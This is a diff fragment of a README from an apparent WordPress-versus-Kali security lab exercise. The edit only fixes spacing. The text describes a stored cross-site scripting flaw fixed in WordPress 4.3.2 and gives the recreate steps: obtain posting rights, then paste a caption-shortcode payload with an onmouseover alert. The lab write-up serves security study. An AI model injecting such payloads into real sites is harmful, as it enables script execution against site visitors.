anushareddy139/Wordpress-vs-Kali/README.md

     - Fixed in version: 4.3.2
   - [ ] GIF Walkthrough:
   - [ ] Steps to recreate:
-    -Get posting privileges from admin, then exploit how HTML is processed and paste the following code onto the post:
+    - Get posting privileges from admin, then exploit how HTML is processed and paste the following code onto the post:
     ```
      <a href="[caption code=">]</a><a title=" onmouseover=alert('exploited')  ">link</a>
     ```